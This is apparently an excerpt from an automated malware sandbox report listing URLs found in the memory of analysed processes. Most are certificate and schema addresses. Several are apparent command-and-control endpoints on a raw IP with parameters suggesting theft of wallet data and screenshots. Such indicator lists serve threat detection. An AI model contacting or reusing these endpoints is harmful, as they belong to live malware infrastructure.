Source: rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php)
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php101
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php2
Source: rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php6
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php:
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?scr=1
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1PR
Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Q
Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1g
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1r
Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rns
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1ws
Source: rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpB/
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpUsers
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpX
Source: Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpa
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpd
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpded
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpindows
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpll32.dll
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpmb3JtLXVybGVuY29kZWQ=ex.php~7
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpoded
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpodedu
Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpsKj
Source: Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpt
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpu
Source: Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpx
Source: rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/Fvu5jh4DbS/index.php
Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/Gyy7jBw4C3efUKzCqRmC8sK1bRhSyTkkD9QYQDw4TYWGHLCsdncEYUAcfHsMuh5M
Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/a
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micE
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: explorer.exe, 00000004.00000002.3376670796.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2047725228.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: powershell.exe, 0000001F.00000002.2524411157.000002E53780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2586089026.000002E545FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021992388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: explorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: CC11.tmp.ctx.exe, 00000010.00000002.2269356516.00007FF8A87CD000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
